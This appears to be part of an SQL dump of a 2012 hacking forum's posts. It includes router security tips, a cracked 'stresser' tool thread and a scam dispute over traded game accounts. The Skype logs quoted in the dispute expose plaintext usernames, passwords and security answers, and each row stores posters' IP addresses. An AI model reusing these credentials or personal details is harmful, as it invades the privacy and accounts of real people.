changed the password, a default password can cause you big troubles![/i][/size]\r\n\r\nThis is not a good password: abc123\r\nBut this is a good password: I2tX3ZPz2hMszg\r\n\r\nIf you don\'t know what you wanna change your password to, there is a great generator [url=https://www.grc.com/passwords.htm][b][u]HERE[/u][/b][/url]\r\n\r\n[hr]\r\n\r\n[b][size=large]Disable Remote Management[/size][/b]\r\n[i][size=medium]\"Remote Management\" is a feature where your router can be administered remotely. In other words, it does so you can control your router anywhere on the internet.[/size][/i]\r\n\r\n[i]While this setting (coupled with a very strong password) might make sense for a handful of people, for most folks there\'s absolutely no need to administer the router from anywhere but the local machines connected to it. \r\n[b]Make sure that remote management setting is off.[/i][/b]\r\n\r\n[hr]\r\n\r\n[b][size=large]Turn off Logging[/size][/b]\r\n[i][size=medium]Ok, you just need to make sure its off, most routers dosen\'t even have this feature, and them who has it likely have it off by default.[/size][/i]\r\n\r\n[i]Disable the logging, and no information will be kept on the router, or sent to any other machine.[/i]\r\n\r\n[hr]\r\n\r\n[b][size=large]Turn off Universal Plug and Play[/size][/b]\r\n[i][size=medium]Universal Plug and Play (Known as UPnP), is a technology tat alows software running on your machine to perform serices like port forwarding without your having to go in and configure the router manually.[/size][/i]\r\n\r\n[i]It turns out that malware can also be UPnP aware, and can make all sorts of malicious changes to your router without your being involved or aware.[/i]\r\n\r\n[size=x-small](Just so you know: UPnP is NOT releated to \"Windows Plug and Play\" hardware detection, it\'s just have a similar name)[/size]\r\n\r\n[hr]\r\n\r\n[b][size=large]Add a WPA Key[/size][/b]\r\n[i][size=medium]It\'s time for another password, this time to secure and encrypt your wireless connection.[/size][/i]\r\n\r\n[b]First:[/b] [i]Use WPA, preferably WPA2. DON\'T use WEP. WEP encryption turns out to be easily crackable.[/i]\r\n\r\n[b]Second:[/b] [i]Select a good, secure key/password, whatever you call it. Just use the same password generator as before which can be found [/i][url=https://www.grc.com/passwords.htm][b][u]HERE[/u][/b][/url]\r\n\r\n[size=x-small]Having a strong WPA password ensures that only machines you allow on your network an see your network, your traffic, and your router.[/size]\r\n\r\n[hr]\r\n\r\n[b][size=large]Don\'t Forget The Physical[/size][/b]\r\n[i][size=medium]All of your routers security settings can be reset in a flash if someone has physical access to the device. Almost all routers have a \"reset to factory defaults\" mechanism - typically by holding a reset button for a certain amount of time. If someone can walk up to your router and do that, then all the security settings you\'ve just enabled may be instantly erased.[/size][/i]\r\n\r\n[i]Only you can judge whether or not you need this extra level of physical security, but make sure to consider it.[/i]\r\n\r\n[hr]\r\n\r\n[b][size=medium]Thanks for reading my guide on how to secure your Router, hope you did find it useful, and I hope it did help you.[/size][/b]\r\n[/align]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c95d4ec6f158161384be2f3933eac19d', '0', '0'); INSERT INTO mybb_posts VALUES('4893', '891', '4878', '35', 'RE: My New Signature !!! | Rate My Signature', '0', '264', 'D?ea', '1350399268', 'Looks great!\nIf I was you, I would might add a glow effect to your name.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '04792fcf8c280b197378b6d359a6faf8', '0', '0'); INSERT INTO mybb_posts VALUES('4894', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '264', 'D?ea', '1350399326', 'I\'m playing the normal Battleon, I have been Guardian for YEARS, maybe about 4 years if i\'m right.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5c7bbeb2e639da92387388013253289f', '0', '0'); INSERT INTO mybb_posts VALUES('4895', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '264', 'D?ea', '1350399432', 'Can I send an application to you?\nOr is it only to active and wellknown people?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'df75c367764c837fdf504df929dcfe2b', '0', '0'); INSERT INTO mybb_posts VALUES('4896', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350399691', 'I already Pm what went down and he don\'t like it then, screw him. If would like more info then pm me, I got bigger issues on restoring my laptop, then to play with you all. I have to check my Card, every single of my accounts. Btw I went first not you \n\nWell\n[10/14/2012 12:24:47 PM] Ryan | Jacob: Umm\n[10/14/2012 12:24:52 PM] Ryan | Jacob: You wanna go first or what?\n[10/14/2012 12:24:59 PM] Ryan | Jacob: I don\'t mind going first.\n[10/14/2012 12:25:11 PM] Zane Anderson: let me\n[10/14/2012 12:25:26 PM] Zane Anderson: well you know the name Toki the ArchAngel right?\n[10/14/2012 12:25:39 PM] Zane Anderson: well the password is Soulweepe1\n[10/14/2012 12:25:48 PM] Zane Anderson: now you', '63.153.255.202', '1067057098', '1', '0', '254', '1350400780', '1', 'f9424ed11581f739ae97f01368125cbd', '0', '1350400780'); INSERT INTO mybb_posts VALUES('4897', '897', '0', '9', 'YouTube SEO - Like a baws.', '0', '264', 'D?ea', '1350400935', 'Hello guys, I will share something with you guys which is REALLY awesome.\r\nIt took me almost a whole day, and I had to be fast.\r\nBut my video: http://www.youtube.com/watch?v=mIhiKMRM0xQ\r\nIs succesful SEO\'ed!\r\n\r\nTry to search for: Felix, Felix Baumgartner, Felix 29 km, 29 kilometers. - Stuff like that!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '75ae3f3fea1f1e012987d84c14c184b9', '0', '0'); INSERT INTO mybb_posts VALUES('4898', '887', '4895', '3', 'RE: How did virtual become Mod? Explanation here', '0', '61', 'NXK', '1350401625', '[quote=\'D?ea\' pid=\'4895\' dateline=\'1350399432\']\r\nCan I send an application to you?\r\nOr is it only to active and wellknown people?\r\n[/quote]\r\nPeople get promoted when we lose a staff member, than we discuss who we think would be a good team member.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1035d7dc02da91c30d4277201a7a6787', '0', '0'); INSERT INTO mybb_posts VALUES('4899', '887', '4898', '3', 'RE: How did virtual become Mod? Explanation here', '0', '264', 'D?ea', '1350401718', '[quote=\'NXK\' pid=\'4898\' dateline=\'1350401625\']\r\n[quote=\'D?ea\' pid=\'4895\' dateline=\'1350399432\']\r\nCan I send an application to you?\r\nOr is it only to active and wellknown people?\r\n[/quote]\r\nPeople get promoted when we lose a staff member, than we discuss who we think would be a good team member.\r\n[/quote]\r\nOkay.\r\nThanks for the quick answer :-)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '3fa853ad5367c7e3ec7ee53f19e7b31a', '0', '0'); INSERT INTO mybb_posts VALUES('4900', '888', '4896', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350401837', '[quote=\'Greed\' pid=\'4896\' dateline=\'1350399691\']\r\nI already Pm what went down and he don\'t like it then, screw him. If would like more info then pm me, I got bigger issues on restoring my laptop, then to play with you all. I have to check my Card, every single of my accounts. Btw I went first not you \r\n\r\nWell\r\n[10/14/2012 12:24:47 PM] Ryan | Jacob: Umm\r\n[10/14/2012 12:24:52 PM] Ryan | Jacob: You wanna go first or what?\r\n[10/14/2012 12:24:59 PM] Ryan | Jacob: I don\'t mind going first.\r\n[10/14/2012 12:25:11 PM] Zane Anderson: let me\r\n[10/14/2012 12:25:26 PM] Zane Anderson: well you know the name Toki the ArchAngel right?\r\n[10/14/2012 12:25:39 PM] Zane Anderson: well the password is Soulweepe1\r\n[10/14/2012 12:25:48 PM] Zane Anderson: now you\r\n[/quote]\r\nPlaying with us? if you scammed a member here tell us, If not prove that you didn\'t.\r\n\r\nJust because you went first doesn\'t mean you can recover..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4ca1e576d197d95773b5f82b69b76838', '0', '0'); INSERT INTO mybb_posts VALUES('4901', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350402205', 'No problem ;D love to contribute.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '23a9ce6003599ecc66fbb6c6a7b0a7a5', '0', '0'); INSERT INTO mybb_posts VALUES('4902', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '264', 'D?ea', '1350402239', 'Thanks man!\nGreat share, this WILL be used ;)', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '0fadc7317da10670b8113e169707700d', '0', '0'); INSERT INTO mybb_posts VALUES('4903', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '84', 'Thunder™', '1350404100', 'I will Join this thanks for Contest', '111.91.75.211', '1868254163', '0', '0', '0', '0', '1', 'c47afeff3c42539ca756d6c43c20d0e4', '0', '0'); INSERT INTO mybb_posts VALUES('4904', '822', '4903', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350404247', '[quote=\'Thunder™\' pid=\'4903\' dateline=\'1350404100\']\r\nI will Join this thanks for Contest\r\n[/quote]\r\n\r\nOkay Nice', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2947e00a8edfc76d40fffd8deaa56e8f', '0', '0'); INSERT INTO mybb_posts VALUES('4905', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350404305', 'ear Hero,\r\n \r\nA request has been just been made to change the email address for your AdventureQuest Worlds account to JacobGFX@aol.com. This is an automatic notice just in case this change was not made by you, or there was a mistake.\r\n \r\nIf you did NOT request this change, do NOT click the following link. If you requested this change, please click here to confirm the change:\r\nhttp://www.aqworlds.com/emailchangeconfirm.asp?55373e1i3f1c5f3d52315j3j411q3q254i375l1e681m452a5q32521q511n5e2q492c6l2d471b5o1e442658365d1o6g2p471g47294e1k5235833g\r\n \r\nThis change will not occur until you click this link.\r\n \r\nIf you did not request this change and feel that your account may have been compromised, please request your password from our automatic password recovery page here:\r\nhttp://www.aqworlds.com/aw-lostpassword.aspx\r\n \r\nand log in to our account management section here:\r\nhttp://account.aqworlds.com\r\n \r\nto change your password.\r\n \r\nUser Name: \'Toki The Archangel\'\r\nDate Created: 10/5/2012 11:00:00 PM\r\nWebsite: http://www.aqworlds.com\r\n \r\nBattle on!\r\nArtix and The AQW team\r\n \r\n------------------\r\nNotice: BattleOn.com and AQWorlds.com only sends emails to registered users of its games. This is a one time only notice. If you have received this email in error, you can disregard this message.\r\n \r\n This is what happens when i click I did not request it.\r\n\r\nUh oh, there is a problem...\r\nPlease go back to your email and try clicking on the link again. Make sure that the entire link is located in the address bar. If only part is there, copy and paste the entire link together from the email.\r\n\r\nReason: Email Change Request not found!\r\n\r\nReturn to Homepage\r\nSo their is no way, that I changed it. If you don\'t believe me then Im out.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '34b1e4e20102c275f8ed67c45935677d', '0', '0'); INSERT INTO mybb_posts VALUES('4906', '898', '0', '71', 'Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '228', 'VirtualLegend', '1350406194', '[align=center][color=#FFFFFF][size=medium]Hello Gamers,\r\n\r\nHave you ever bought a PC game and later at home the game isn\'t running good on your PC/Laptop. I have a solution for you !!!\r\n\r\nThere is a site where you can see of every game in the world if your PC/Laptop can run it. The Site Uses scanners to scan your specs and compares it with the Game.\r\n\r\nSite: [url=http://www.systemrequirementslab.com/cyri/intro.aspx]http://www.systemrequirementslab.com/cyri/intro.aspx[/url] \r\n\r\nHow to Site Looks like:\r\n[img]http://i.imgur.com/ziJwj.png[/img]\r\n\r\nI Hope that i helped a few people with this !!![/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '20574a97e833d0685197bd8f54f514be', '0', '0'); INSERT INTO mybb_posts VALUES('4907', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '228', 'VirtualLegend', '1350406362', 'Welcome to LH. I Hope that you like it and of course stay Active & HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '77abbfd008841c30c1c0dfdf8f892536', '0', '0'); INSERT INTO mybb_posts VALUES('4908', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '62', 'R?????zo?', '1350408257', 'Alreay knew this, thanks for sharing though :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a4856a87eed86475b8d69efa2d6ad77', '0', '0'); INSERT INTO mybb_posts VALUES('4909', '888', '4832', '7', 'RE: Greed is a scammer', '0', '62', 'R?????zo?', '1350408917', 'That does not prove anything really.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd4aedcb678a26e695f45d450dc4a5040', '0', '0'); INSERT INTO mybb_posts VALUES('4910', '888', '4832', '7', 'RE: Greed is a scammer', '0', '254', 'Greed', '1350409520', 'it does actually it proves that I couldn\'t of got back my account the way that he said so this is the end of this, and I going to get banned because I requested it. So yeah bye everyone and have a nice life and I hope you all do well when I\'m gone.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'd983503d8d4b0f7dae961e91713b00d3', '0', '0'); INSERT INTO mybb_posts VALUES('4911', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '100', '??zg???g????61', '1350414658', 'Only five people and its already been 4 days ;DD', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '9aa5ca8a1ba0ba1912fe11fa9d9e5067', '0', '0'); INSERT INTO mybb_posts VALUES('4912', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '82', 'iTzIpod', '1350416335', 'Welcome to L33tHacking.\nEnjoy your stay!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06111e49cc6e0e00826351bec2920209', '0', '0'); INSERT INTO mybb_posts VALUES('4913', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350416673', 'We want you, but we don\'t need you. \n\nYou\'re telling me that your computer got hacked.\nBut how?\nYou didn\'t explain that...\n\n+ If you got that from your email, just press Forgot Password on the login screen and give me the account. Simple and done..\n\n\nSkype Chat Log:\n[10/14/2012 7:25:00 AM] Zane Anderson: Hello, Im Greed from l33t hacking\n[10/14/2012 12:07:55 PM] Ryan | Jacob: Ryan | Jacob has shared contact details with Zane Anderson.\n[10/14/2012 12:41:08 PM] Zane Anderson: hello\n[10/14/2012 12:41:24 PM] Ryan | Jacob: Hey\n[10/14/2012 12:41:40 PM] Zane Anderson: sorry im ussally on do not distrub\n[10/14/2012 12:42:06 PM] Zane Anderson: lol, I think it annoying when you get messaged\n[10/14/2012 12:42:42 PM] Zane Anderson: but yeah whats up?\n[10/14/2012 12:53:11 PM] Ryan | Jacob: No\n[10/14/2012 12:53:17 PM] Ryan | Jacob: I\'m just playing MC\n[10/14/2012 12:53:46 PM] Zane Anderson: eh im playing adventure quest\n[10/14/2012 12:53:52 PM] Ryan | Jacob: Oh\n[10/14/2012 12:53:55 PM] Ryan | Jacob: AQW?\n[10/14/2012 12:53:57 PM] Zane Anderson: no\n[10/14/2012 12:54:08 PM] Zane Anderson: i got a x guardian\n[10/14/2012 12:55:27 PM] Ryan | Jacob: Nice\n[10/14/2012 12:55:31 PM] Ryan | Jacob: Can I have? :3\n[10/14/2012 12:55:36 PM] Zane Anderson: lol no\n[10/14/2012 12:55:49 PM] Zane Anderson: i just started him\n[10/14/2012 12:55:52 PM] Zane Anderson: he like lvl 23?\n[10/14/2012 12:55:55 PM] Ryan | Jacob: Nice\n[10/14/2012 12:56:14 PM] Zane Anderson: can\'t wait til lvl 30\n[10/14/2012 12:56:28 PM] Zane Anderson: so i can get kung fu stuff\n[10/14/2012 12:57:54 PM] Zane Anderson: I also got a dragon amulet for dragonfable\n[10/14/2012 1:02:00 PM] Zane Anderson: oh hey do you have any mc account i can have?\n[10/14/2012 1:02:55 PM] Ryan | Jacob: YEah\n[10/14/2012 1:02:56 PM] Ryan | Jacob: Yeah\n[10/14/2012 1:02:57 PM] Ryan | Jacob: I got one\n[10/14/2012 1:03:12 PM] Zane Anderson: i can have it?\n[10/14/2012 1:03:20 PM] Ryan | Jacob: Yeah\n[10/14/2012 1:03:25 PM] Zane Anderson: ok\n[10/14/2012 1:03:52 PM] Ryan | Jacob: Got anything to trade for it?\n[10/14/2012 1:03:53 PM] Ryan | Jacob: :P\n[10/14/2012 1:04:42 PM] Zane Anderson: how bout my aqw guy?\n[10/14/2012 1:05:54 PM] Ryan | Jacob: Can I see the character things?\n[10/14/2012 1:05:58 PM] Ryan | Jacob: Character Page\n[10/14/2012 1:06:10 PM] Zane Anderson: yeah\n[10/14/2012 1:06:50 PM] Zane Anderson: http://www.aq.com/aw-character.asp?id=Toki%20The%20ArchAngel\n[10/14/2012 1:07:57 PM] Zane Anderson: has 3 month membership\n[10/14/2012 1:08:36 PM] Ryan | Jacob: Anything else on it?\n[10/14/2012 1:09:03 PM] Zane Anderson: hmmm i think a few ac\n[10/14/2012 1:09:27 PM] Ryan | Jacob: When did you get membership on it?\n[10/14/2012 1:09:34 PM] Ryan | Jacob: When did you start playing AQW?\n[10/14/2012 1:09:38 PM] Zane Anderson: lol\n[10/14/2012 1:09:40 PM] Ryan | Jacob: Isn\'t it boring?\n[10/14/2012 1:10:04 PM] Zane Anderson: my guy was created 10/5/12\n[10/14/2012 1:10:15 PM] Ryan | Jacob: Oh\n[10/14/2012 1:10:26 PM] Ryan | Jacob: You sure about this trade?\n[10/14/2012 1:10:51 PM] Zane Anderson: yeah, ill just unlink from my master account\n[10/14/2012 1:10:57 PM] Zane Anderson: then it be yours\n[10/14/2012 1:11:02 PM] Ryan | Jacob: Yeah but\n[10/14/2012 1:11:17 PM] Ryan | Jacob: Is there any other accounts linked to the AQW account?\n[10/14/2012 1:11:25 PM] Ryan | Jacob: AQ, DF, MQ, etc?\n[10/14/2012 1:11:35 PM] Zane Anderson: yeah my aq guy and df guy\n[10/14/2012 1:12:58 PM] Zane Anderson: so?\n[10/14/2012 1:14:11 PM] Ryan | Jacob: Oh\n[10/14/2012 1:14:13 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:14:22 PM] Ryan | Jacob: Do you like playing AQW though?\n[10/14/2012 1:14:31 PM] Zane Anderson: why? lol\n[10/14/2012 1:15:02 PM] Ryan | Jacob: Just asking?\n[10/14/2012 1:15:09 PM] Zane Anderson: not really\n[10/14/2012 1:15:33 PM] Ryan | Jacob: Lol alright\n[10/14/2012 1:15:37 PM] Ryan | Jacob: You want to go first or something?\n[10/14/2012 1:16:08 PM] Zane Anderson: wait\n[10/14/2012 1:16:26 PM] Zane Anderson: i try to remove it from my master account\n[10/14/2012 1:16:31 PM] Zane Anderson: but\n[10/14/2012 1:16:40 PM] Zane Anderson: it said this\n[10/14/2012 1:16:41 PM] Zane Anderson: Sorry! You may not unlink your VIP Membership Account.\n[10/14/2012 1:17:04 PM] Zane Anderson: so is it okay if it still link to my account?\n[10/14/2012 1:17:26 PM] Ryan | Jacob: I don\'t know :/\n[10/14/2012 1:18:02 PM] Zane Anderson: well I don\'t want to screw you over\n[10/14/2012 1:20:10 PM] Ryan | Jacob: Well you have access to the account\n[10/14/2012 1:20:13 PM] Ryan | Jacob: If you give me it\n[10/14/2012 1:20:21 PM] Ryan | Jacob: Since it\'s linked to your Master Account.\n[10/14/2012 1:21:11 PM] Zane Anderson: so this is a no go?\n[10/14/2012 1:21:23 PM] Ryan | Jacob: I don\'t know..\n[10/14/2012 1:21:31 PM] Ryan | Jacob: I have a feeling I might get scammed\n[10/14/2012 1:21:55 PM] Zane Anderson: like i said i don\'t want to screw you over\n[10/14/2012 1:22:22 PM] Ryan | Jacob: Well I don\'t know who you are.. -.-\n[10/14/2012 1:22:54 PM] Zane Anderson: well im greed from leet hacking lol\n[10/14/2012 1:23:14 PM] Zane Anderson: and im zane irl\n[10/14/2012 1:23:22 PM] Zane Anderson: lol\n[10/14/2012 1:24:04 PM] Ryan | Jacob: Oh\n[10/14/2012 1:24:14 PM] Zane Anderson: ?\n[10/14/2012 1:24:34 PM] Ryan | Jacob: Well\n[10/14/2012 1:24:37 PM] Ryan | Jacob: Umm\n[10/14/2012 1:24:43 PM] Ryan | Jacob: You wanna go first or what?\n[10/14/2012 1:24:49 PM] Ryan | Jacob: I don\'t mind going first.\n[10/14/2012 1:25:01 PM] Zane Anderson: let me\n[10/14/2012 1:25:17 PM] Zane Anderson: well you know the name Toki the ArchAngel right?\n[10/14/2012 1:25:30 PM] Zane Anderson: well the password is Removed for safety reasons\n[10/14/2012 1:25:39 PM] Zane Anderson: now you\n[10/14/2012 1:27:02 PM] Zane Anderson: so?\n[10/14/2012 1:27:32 PM] Ryan | Jacob: Username: fly787\n[10/14/2012 1:27:38 PM] Ryan | Jacob: Password: flydream787\n[10/14/2012 1:27:43 PM] Ryan | Jacob: Tell me if it works or no\n[10/14/2012 1:27:44 PM] Ryan | Jacob: Not\n[10/14/2012 1:27:47 PM] Ryan | Jacob: I will give you a new one\n[10/14/2012 1:27:57 PM] Zane Anderson: wait don\'t i need a email to login?\n[10/14/2012 1:28:08 PM] Ryan | Jacob: No\n[10/14/2012 1:28:12 PM] Ryan | Jacob: Unless it\'s Migrated.\n[10/14/2012 1:28:44 PM] Zane Anderson: Oops, unknown username or password. If you are logging in with a Mojang account make sure to use your e-mail address as username.\n[10/14/2012 1:29:18 PM] Ryan | Jacob: Oh\n[10/14/2012 1:29:20 PM] Ryan | Jacob: Alright.\n[10/14/2012 1:29:26 PM] Ryan | Jacob: Wait\n[10/14/2012 1:29:29 PM] Zane Anderson: ?\n[10/14/2012 1:29:30 PM] Ryan | Jacob: Try it vice versa\n[10/14/2012 1:29:34 PM] Zane Anderson: k\n[10/14/2012 1:29:42 PM] Ryan | Jacob: [Sunday, October 14, 2012 1:27 PM] Ryan | Jacob: \n\n<<< Username: fly787\nPassword: flydream787\n[10/14/2012 1:29:46 PM] Ryan | Jacob: Password is Username\n[10/14/2012 1:29:49 PM] Ryan | Jacob: Username is Password\n[10/14/2012 1:30:25 PM] Zane Anderson: still cant\n[10/14/2012 1:30:31 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:30:37 PM] Zane Anderson: have you tried?\n[10/14/2012 1:30:47 PM] Ryan | Jacob: Nope :3\n[10/14/2012 1:30:48 PM] Ryan | Jacob: jquilty@uk2.net:bentley\n[10/14/2012 1:30:53 PM] Ryan | Jacob: Username/Email:Password\n[10/14/2012 1:30:54 PM] Ryan | Jacob: ^\n[10/14/2012 1:30:56 PM] Ryan | Jacob: Should work\n[10/14/2012 1:30:58 PM] Ryan | Jacob: For that one\n[10/14/2012 1:31:12 PM] Zane Anderson: pasword?\n[10/14/2012 1:31:18 PM] Zane Anderson: both?\n[10/14/2012 1:31:26 PM] Zane Anderson: wait\n[10/14/2012 1:31:30 PM] Zane Anderson: lol\n[10/14/2012 1:31:35 PM | Edited 1:31:41 PM] Ryan | Jacob: Password is bentley\n[10/14/2012 1:31:56 PM] Ryan | Jacob: Tried all these accounts yesterday..\n[10/14/2012 1:32:16 PM] Zane Anderson: mk\n[10/14/2012 1:33:44 PM] Zane Anderson: ok it worked\n[10/14/2012 1:33:57 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:35:12 PM] Ryan | Jacob: So can I change the password\n[10/14/2012 1:35:16 PM] Ryan | Jacob: And all on the AQW account?\n[10/14/2012 1:35:29 PM] Zane Anderson: yep\n[10/14/2012 1:35:34 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:35:58 PM] Zane Anderson: looks like i cant change anything on the mc account\n[10/14/2012 1:36:46 PM] Ryan | Jacob: What do you mean?\n[10/14/2012 1:37:07 PM] Zane Anderson: im trying to change the password on the minecraft account\n[10/14/2012 1:37:22 PM] Zane Anderson: but cant lol\n[10/14/2012 1:37:26 PM] Ryan | Jacob: Whynot?\n[10/14/2012 1:37:38 PM] Zane Anderson: Since you are logging in from this computer for the first time we need you to confirm your identity before you can continue. This is to make sure that your account isn\'t used without your authorization.\n\nTo confirm your identity, please answer the questions below.\n[10/14/2012 1:38:32 PM] Ryan | Jacob: What\'s the question?\n[10/14/2012 1:38:42 PM] Zane Anderson: What is the name of your favorite cartoon?\n[10/14/2012 1:38:50 PM] Ryan | Jacob: Try\n[10/14/2012 1:38:52 PM] Ryan | Jacob: Spongebob\n[10/14/2012 1:38:56 PM] Ryan | Jacob: Or someshit?\n[10/14/2012 1:38:58 PM] Ryan | Jacob: Uhh\n[10/14/2012 1:38:59 PM] Ryan | Jacob: Try 123\n[10/14/2012 1:39:44 PM] Zane Anderson: no\n[10/14/2012 1:39:53 PM] Zane Anderson: doesnt work\n[10/14/2012 1:41:09 PM] Ryan | Jacob: :/\n[10/14/2012 1:41:27 PM] Ryan | Jacob: I can\'t change the email or anything.\n[10/14/2012 1:41:54 PM] Zane Anderson: why?\n[10/14/2012 1:42:03 PM] Ryan | Jacob: You gotta verify it.\n[10/14/2012 1:42:11 PM] Zane Anderson: oh\n[10/14/2012 1:42:19 PM] Zane Anderson: well help me lol\n[10/14/2012 1:42:47 PM] Ryan | Jacob: I will.\n[10/14/2012 1:42:55 PM] Ryan | Jacob: I\'ll just give you my personal account...\n[10/14/2012 1:43:09 PM] Zane Anderson: oh?\n[10/14/2012 1:43:15 PM] Zane Anderson: really?\n[10/14/2012 1:43:18 PM | Edited 1:43:24 PM] Ryan | Jacob: Yeah.\n[10/14/2012 1:43:33 PM] Zane Anderson: well ok\n[10/14/2012 1:43:38 PM] Ryan | Jacob: Email?\n[10/14/2012 1:43:45 PM] Zane Anderson: ok\n[10/14/2012 1:43:53 PM] Zane Anderson: i vefifyed it\n[10/14/2012 1:44:02 PM] Zane Anderson: can never spell that word right\n[10/14/2012 1:44:12 PM] Ryan | Jacob: Verified?\n[10/14/2012 1:44:14 PM] Zane Anderson: yea\n[10/14/2012 1:44:28 PM] Zane Anderson: now its in ur email\n[10/14/2012 1:44:33 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:44:35 PM] Ryan | Jacob: Wait\n[10/14/2012 1:44:38 PM] Ryan | Jacob: I\'m changing the information\n[10/14/2012 1:44:40 PM] Ryan | Jacob: Uhm\n[10/14/2012 1:44:42 PM] Ryan | Jacob: For the MC account\n[10/14/2012 1:44:47 PM] Zane Anderson: k\n[10/14/2012 1:44:47 PM] Ryan | Jacob: What email do you want it to be.\n[10/14/2012 1:44:55 PM] Zane Anderson: well my email\n[10/14/2012 1:45:11 PM] Zane Anderson: Removed for safety reasons\n[10/14/2012 1:46:37 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:47:14 PM] Zane Anderson: mk\n[10/14/2012 1:47:30 PM] Ryan | Jacob: There.\n[10/14/2012 1:47:33 PM] Ryan | Jacob: Check your email?\n[10/14/2012 1:47:40 PM] Ryan | Jacob: Username: Removed for safety reasons\n[10/14/2012 1:47:44 PM] Ryan | Jacob: Password: Removed for safety reasons\n[10/14/2012 1:47:47 PM] Ryan | Jacob: Email: Removed for safety reasons\n[10/14/2012 1:48:08 PM] Ryan | Jacob: Did you receive it?\n[10/14/2012 1:48:11 PM] Zane Anderson: yeah\n[10/14/2012 1:48:16 PM] Zane Anderson: um\n[10/14/2012 1:48:26 PM] Ryan | Jacob: Change the Password\n[10/14/2012 1:48:26 PM] Zane Anderson: now i need to confrim it\n[10/14/2012 1:48:36 PM] Ryan | Jacob: So I can\'t login the account anymore.\n[10/14/2012 1:48:39 PM] Zane Anderson: whats your fathers middle name\n[10/14/2012 1:48:42 PM] Ryan | Jacob: 123\n[10/14/2012 1:48:45 PM] Zane Anderson: k\n[10/14/2012 1:48:50 PM] Ryan | Jacob: Is the Security Questions\n[10/14/2012 1:48:53 PM] Zane Anderson: got it\n[10/14/2012 1:48:54 PM] Ryan | Jacob: For everything.\n[10/14/2012 1:49:03 PM] Ryan | Jacob: And now\n[10/14/2012 1:49:12 PM] Ryan | Jacob: Are you done with the MC account?\n[10/14/2012 1:49:40 PM] Zane Anderson: yea\n[10/14/2012 1:49:48 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:49:49 PM] Ryan | Jacob: Back to me\n[10/14/2012 1:49:57 PM] Zane Anderson: k\n[10/14/2012 1:50:43 PM] Zane Anderson: now what ya need?\n[10/14/2012 1:51:20 PM] Ryan | Jacob: Okay\n[10/14/2012 1:51:47 PM] Ryan | Jacob: Did it work?\n[10/14/2012 1:51:51 PM] Ryan | Jacob: Check your email\n[10/14/2012 1:51:52 PM] Ryan | Jacob: For anything?\n[10/14/2012 1:52:02 PM] Zane Anderson: well now its your email\n[10/14/2012 1:52:13 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:52:23 PM] Ryan | Jacob: But you still can access the account right?\n[10/14/2012 1:52:27 PM] Ryan | Jacob: Through your Master Account..\n[10/14/2012 1:52:49 PM] Zane Anderson: yeah i see him\n[10/14/2012 1:52:59 PM] Ryan | Jacob: Oh\n[10/14/2012 1:53:00 PM] Ryan | Jacob: :/\n[10/14/2012 1:53:04 PM | Edited 1:53:09 PM] Ryan | Jacob: Now you know my Password.\n[10/14/2012 1:53:14 PM] Ryan | Jacob: And you can access the account.\n[10/14/2012 1:53:15 PM] Zane Anderson: did you change his password?\n[10/14/2012 1:53:17 PM] Ryan | Jacob: Yeah.\n[10/14/2012 1:53:28 PM] Zane Anderson: then i cant do anything to him\n[10/14/2012 1:53:43 PM] Zane Anderson: i need to login into him to do anything\n[10/14/2012 1:53:59 PM] Ryan | Jacob: Oh.\n[10/14/2012 1:54:04 PM] Zane Anderson: so your good\n[10/14/2012 1:54:34 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:55:14 PM] Zane Anderson: well that worked out well\n[10/14/2012 1:55:27 PM] Ryan | Jacob: Okay.\n[10/14/2012 1:55:34 PM] Ryan | Jacob: Hoping it\'s good.\n[10/14/2012 1:55:37 PM] Ryan | Jacob: And worth the trade.\n[10/14/2012 1:55:46 PM] Zane Anderson: wait can you acess the mc account by the 123 thingy\n[10/14/2012 1:56:30 PM] Zane Anderson: nvm\n[10/14/2012 1:56:35 PM] Ryan 